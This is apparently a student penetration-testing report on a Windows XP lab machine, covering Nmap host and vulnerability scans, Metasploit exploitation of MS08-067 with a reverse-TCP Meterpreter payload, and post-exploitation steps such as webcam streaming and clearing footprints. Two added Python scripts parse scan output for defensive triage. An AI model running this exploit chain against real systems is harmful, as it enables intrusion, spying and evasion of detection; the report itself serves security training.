Vulnerability Assessment & Penetration Testing Report on Windows XP


Vulnerability assessment is the process of defining, identifying, classifying and prioritizing vulnerabilities in computer systems, applications and network infrastructures, and of providing the organization doing the assessment with the knowledge, awareness and risk background it needs to understand the threats to its environment and react appropriately.


This Vulnerability Assessment & Penetration Testing on Windows XP project was done by ICSS student Prashant Kumar. The full process is discussed below.


Project Name: Vulnerability Assessment & Penetration Testing on Windows XP

Author Name: Prashant Kumar

Publish Date: 24-07-2018



Vulnerability Assessment and Penetration Testing (VAPT) is a systematic analysis of the security status of information systems. Vulnerability assessment is an on-demand solution which makes it convenient to run tests over the Internet anywhere, anytime. It is a hybrid solution which blends automated testing with security expert analysis, and the combination aims to identify all possible attack vectors. A vulnerability assessment offers only a partial evaluation of vulnerabilities; actually testing for them by penetrating the barriers is a useful adjunct, as it identifies potential access paths missed by the vulnerability assessment scan (VAS). Penetration testing, aka “pen testing”, is the practice of testing a computer system, network or web application to find vulnerabilities that an attacker could exploit.

Vulnerability assessments and pen tests can be automated with software applications or performed manually. Either way, the process includes gathering information about the target before the test (reconnaissance), identifying possible entry points, attempting to break in (either virtually or for real) and reporting back the findings.

The main objective of penetration testing is to determine security weaknesses. A pen test can also be used to test an organization’s security policy compliance, its employees’ security awareness and the organization’s ability to identify and respond to security incidents. The tests are carried out by pen testers, aka the “Red Team”.


Vulnerability Assessment



Life cycle of penetration testing:





Reconnaissance denotes the work of information gathering before any real attacks are planned. The idea is to collect as much interesting information as possible about the target. Reconnaissance is probably the longest phase, sometimes lasting weeks or months. But here we have a known target, a Windows XP machine connected to the same network as our attacking machine, so to find the target machine we run an Nmap scan.

After the Nmap scan the live hosts are:




Now we need the OS details of every system connected to the network so that we can find our target machine. First we separate out the live IP addresses: we save the scan result above in a text file and then filter out the IP addresses with the commands below.


nmap -sV -sP > livehosts.txt


cat livehosts.txt | grep "for" | cut -d " " -f5 > ip.txt


The output is:




Now we have to check which of them is a Windows XP machine, so we run Nmap with OS detection (-O) against all the live IPs:

nmap -sV -O -iL ip.txt > osdetails.txt


And the output is:


Starting Nmap 7.60 ( ) at 2018-07-23 02:06 IST
Nmap scan report for XiaoQiang ( )
Host is up (0.014s latency).
Not shown: 995 closed ports
53/tcp   open  domain  dnsmasq 2.71
80/tcp   open  http    nginx
8192/tcp open  http    Tengine httpd
8193/tcp open  http    nginx
8899/tcp open  http    Tengine httpd
MAC Address: 78:11:DC:18:76:21 (Xiaomi Electronics,co.)
No exact OS matches for host (If you know what OS is running on it, see ).
TCP/IP fingerprint:
OS:SCAN(V=7.60%E=4%D=7/23%OT=53%CT=1%CU=41503%PV=Y%DS=1%DC=D%G=Y%M=7811DC%T
OS:=M5B4NNT11NW7%O4=M5B4ST11NW7%O5=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=3890%W2=3
OS:890%W3=3890%W4=3890%W5=3890%W6=3890)ECN(R=Y%DF=Y%T=40%W=3908%O=M5B4NNSNW
OS:7%CC=N%Q=)T1(R=Y%DF=Y%T=40%S=A%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF
OS:=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=
OS:%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N%
Network Distance: 1 hop


Nmap scan report for
Host is up (0.016s latency).
Not shown: 999 closed ports
62078/tcp open  tcpwrapped
MAC Address: 88:19:08:C9:D6:A8 (Unknown)
No exact OS matches for host (If you know what OS is running on it, see ).
TCP/IP fingerprint:
OS:SCAN(V=7.60%E=4%D=7/23%OT=62078%CT=1%CU=31349%PV=Y%DS=1%DC=D%G=Y%M=88190
OS:R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S
OS:=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=N%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R
OS:=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=N%T=40%W=0%S=Z%A=S%F=A
Network Distance: 1 hop

Nmap scan report for
Host is up (0.00062s latency).
Not shown: 996 closed ports
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows XP microsoft-ds
2869/tcp open  http          Microsoft HTTPAPI httpd 1.0 (SSDP/UPnP)
MAC Address: 00:0C:29:BE:B1:2B (VMware)
Device type: general purpose
Running: Microsoft Windows XP|2003
OS CPE: cpe:/o:microsoft:windows_xp::sp2:professional cpe:/o:microsoft:windows_server_2003
OS details: Microsoft Windows XP Professional SP2 or Windows Server 2003
Network Distance: 1 hop
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp


Nmap scan report for
Host is up (0.000017s latency).
Not shown: 999 closed ports
22/tcp open  ssh  OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.1
Network Distance: 0 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at .
Nmap done: 6 IP addresses (4 hosts up) scanned in 261.30 seconds.


After analysing the scan results, the third host above (OS details: Microsoft Windows XP Professional SP2 or Windows Server 2003, with SMB open on 139/tcp and 445/tcp) is our target machine. Now that we have identified our target we move on to the next part.
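As an added example (not part of the original report), the following Python script does the two steps above in one pass: it extracts the live IP addresses from Nmap's normal output and then picks out hosts whose OS fingerprint names Windows XP and which expose SMB on 139/445. Unlike the grep/cut pipeline, it also handles the "Nmap scan report for <name> (<ip>)" form that the first host (XiaoQiang) produced, where field 5 would be the hostname rather than the address. The sample scan text inside it is constructed from the report's output using documentation-range (192.0.2.x) addresses and example MAC addresses; the function and class names are my own.

```python
"""Parse Nmap normal output (-sV -O) into a host inventory and flag end-of-life
Windows XP hosts that expose SMB. Added example, not part of the original report;
the sample scan below is constructed (documentation-range addresses) and modelled
on the report's own output."""
import re
from dataclasses import dataclass, field

# Constructed sample output: three hosts in the 192.0.2.0/24 documentation range.
SAMPLE_SCAN = """\
Starting Nmap 7.60 ( https://nmap.org ) at 2018-07-23 02:06 IST
Nmap scan report for XiaoQiang (192.0.2.1)
Host is up (0.014s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        dnsmasq 2.71
80/tcp   open  http          nginx
MAC Address: 00:00:5E:00:53:01 (Example vendor)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
Network Distance: 1 hop

Nmap scan report for 192.0.2.10
Host is up (0.00062s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows XP microsoft-ds
2869/tcp open  http          Microsoft HTTPAPI httpd 1.0 (SSDP/UPnP)
MAC Address: 00:00:5E:00:53:02 (VMware)
Running: Microsoft Windows XP|2003
OS details: Microsoft Windows XP Professional SP2 or Windows Server 2003
Network Distance: 1 hop

Nmap scan report for 192.0.2.20
Host is up (0.000017s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
OS details: Linux 3.10 - 4.1
Network Distance: 0 hops

Nmap done: 6 IP addresses (3 hosts up) scanned in 261.30 seconds.
"""

# Matches "Nmap scan report for 192.0.2.10" and "Nmap scan report for name (192.0.2.1)";
# the report's `cut -d " " -f5` returns the hostname, not the address, in the second form.
HOST_RE = re.compile(r"^Nmap scan report for (?:(?P<name>\S+) \()?(?P<ip>[\d.]+)\)?$")
PORT_RE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)\s*(?P<version>.*)$")
SMB_PORTS = {139, 445}


@dataclass
class Host:
    ip: str
    hostname: str = ""
    mac: str = ""
    os_details: str = ""
    ports: dict = field(default_factory=dict)  # port number -> (service, version)


def parse_nmap_normal(text: str) -> list[Host]:
    """Walk the scan line by line; each 'Nmap scan report for' line starts a new host."""
    hosts: list[Host] = []
    cur = None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            cur = Host(ip=m["ip"], hostname=m["name"] or "")
            hosts.append(cur)
            continue
        if cur is None:
            continue  # banner lines before the first host
        m = PORT_RE.match(line)
        if m and m["state"] == "open":
            cur.ports[int(m["port"])] = (m["service"], m["version"].strip())
        elif line.startswith("MAC Address: "):
            cur.mac = line.split()[2]
        elif line.startswith("OS details: "):
            cur.os_details = line[len("OS details: "):]
    return hosts


def live_ips(text: str) -> list[str]:
    """Same job as the report's grep/cut pipeline, correct for both 'scan report' forms."""
    return [h.ip for h in parse_nmap_normal(text)]


def eol_smb_hosts(hosts: list[Host]) -> list[Host]:
    """Hosts whose OS fingerprint names Windows XP and which expose SMB (139 or 445)."""
    return [h for h in hosts
            if "Windows XP" in h.os_details and SMB_PORTS & set(h.ports)]


if __name__ == "__main__":
    inventory = parse_nmap_normal(SAMPLE_SCAN)
    print("live hosts:", live_ips(SAMPLE_SCAN))
    for h in eol_smb_hosts(inventory):
        exposed = sorted(SMB_PORTS & set(h.ports))
        print(f"end-of-life Windows XP host {h.ip} exposes SMB on {exposed}")
```

Run against a real osdetails.txt by reading the file into `parse_nmap_normal` instead of `SAMPLE_SCAN`; the list it returns is the asset inventory a defender would use to find unsupported hosts that need patching, isolation or SMB blocked at the firewall.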



Vulnerability scanning


In this part we scan the target machine for known vulnerabilities. Again we use Nmap, this time running its vulnerability-detection scripts against the target:


nmap -Pn --script vuln > vuln.txt


The output is :




The above picture shows the list of vulnerabilities, which are as follows:


|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED


This vulnerability exists but it doesn’t provide any user access, so it can’t be used. The next one is:




This vulnerability allows a user to get remote access to the target system, and it exists on the Windows XP/2003 machine which is our target.


Then the last one listed is:



This vulnerability also allows users to get remote access to the target system, but it is not available on the Windows XP/2003 machine; it only exists on Windows servers.


So now we will use the ms08_067 vulnerability to exploit the machine with Metasploit.
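The triage above (one script result that could not be used, one confirmed finding, one not applicable) can be done mechanically on the saved vuln.txt. As an added example, not part of the original report, the following Python script parses the output of the NSE vulnerability scripts, records each script's verdict per host, and orders the findings so that confirmed vulnerable results come first. A one-line result such as NT_STATUS_ACCESS_DENIED means the check could not complete rather than that the host is safe, so it is kept as an error to re-run with credentials. The sample output inside it is constructed in the NSE vulns-library layout with a documentation-range address; script names smb-vuln-ms08-067, smb-vuln-ms10-054 and samba-vuln-cve-2012-1182 are real Nmap scripts, and the function names are my own.

```python
"""Triage `nmap --script vuln` output. Added example, not part of the original
report; the sample text below is constructed in the NSE vulns-library layout."""
import re
from collections import defaultdict

# Constructed sample: one host, three script results (one error, one vulnerable, one not).
SAMPLE_VULN = """\
Nmap scan report for 192.0.2.10
Host is up (0.00062s latency).
PORT     STATE SERVICE
445/tcp  open  microsoft-ds
Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms08-067: 
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|_    State: VULNERABLE
| smb-vuln-ms10-054:
|   NOT VULNERABLE:
|   SMB remote memory corruption vulnerability
|_    State: NOT VULNERABLE
"""

HOST_RE = re.compile(r"^Nmap scan report for (?:\S+ \()?(?P<ip>[\d.]+)\)?$")
# "| script-name: value" or "|_script-name: value" opens a script result
SCRIPT_RE = re.compile(r"^\|[_ ](?P<name>[A-Za-z0-9-]+):\s*(?P<value>.*)$")
# indented "State: ..." line inside a vulns-library result
STATE_RE = re.compile(r"^\|[_ ]\s+State:\s*(?P<state>.+?)\s*$")

# lower number = look at it first
PRIORITY = {"VULNERABLE": 0, "LIKELY VULNERABLE": 1, "UNKNOWN": 2, "NOT VULNERABLE": 4}
ERROR_PRIORITY = 3  # check did not complete; needs credentials or a re-run


def parse_vuln_output(text: str) -> dict:
    """Return {ip: {script_name: state}}.

    state is the vulns-library verdict (VULNERABLE / LIKELY VULNERABLE / NOT VULNERABLE),
    or 'ERROR: <status>' when the script only printed a one-line status such as
    NT_STATUS_ACCESS_DENIED, or UNKNOWN when no State line was found."""
    findings = defaultdict(dict)
    ip = script = None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            ip, script = m["ip"], None
            continue
        m = SCRIPT_RE.match(line)
        if m and ip:
            script = m["name"]
            value = m["value"].strip()
            # a one-line result is a status from the script, not a verdict
            findings[ip][script] = f"ERROR: {value}" if value else "UNKNOWN"
            continue
        m = STATE_RE.match(line)
        if m and ip and script:
            findings[ip][script] = m["state"]
    return dict(findings)


def prioritize(findings: dict) -> list:
    """Flatten to (ip, script, state) tuples, confirmed vulnerable first."""
    rows = [(ip, name, state)
            for ip, scripts in findings.items() for name, state in scripts.items()]
    return sorted(rows, key=lambda r: PRIORITY.get(r[2], ERROR_PRIORITY))


if __name__ == "__main__":
    for ip, name, state in prioritize(parse_vuln_output(SAMPLE_VULN)):
        print(f"{ip:<16} {name:<28} {state}")
```

For the real scan, read vuln.txt into `parse_vuln_output`; everything that comes back VULNERABLE is the patch list for the system owner, and every ERROR row is a check to repeat with valid credentials before declaring the host clean.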



Attack & Penetration


Now that we know the vulnerability, we search for it in the Metasploit Framework database. Metasploit Framework has a huge collection of exploits, payloads and modules which are used by the hacking community. It is launched by typing msfconsole in the terminal.

Now we search for the ms08_067 vulnerability by typing:

search ms08_067




The description of this module is:




This module is selected with the following command:

use exploit/windows/smb/ms08_067_netapi

Now the following commands are used to list the payloads of this module and to set one of them as required.

show payloads

We are going to use ‘windows/meterpreter/reverse_tcp’ payload.

set payload windows/meterpreter/reverse_tcp

show options

set rhost <target ip address>

set lhost <attacker ip address>




Now, to get an access session with the target machine, the exploit command is used:






Post exploitation


Once we get a meterpreter session we have full access to the target machine. We can do anything we want; for example, we can escalate privileges with the command:



To confirm, check the IP with the command:



The following picture shows that:



We can see the options by typing help. Some common commands are:





webcam_stream (If the target machine has a webcam)






When our task is completed and the target machine is no longer needed, we clear our footprints using the command:





Conclusion & Recommendations


Reviewing the vulnerability and getting access to the system shows what a big security threat it is: our data can be misused, so the machine should be kept safe from such things.

This particular vulnerability was patched by Microsoft a long time ago, so just perform a Windows update and this vulnerability will automatically disappear.


Recommendations are:

  • Always keep the machine & its software updated.


  • Use a good antivirus.


  • We can use a custom firewall too.


  • Don’t install software from unknown sources.






…………End of the report………..


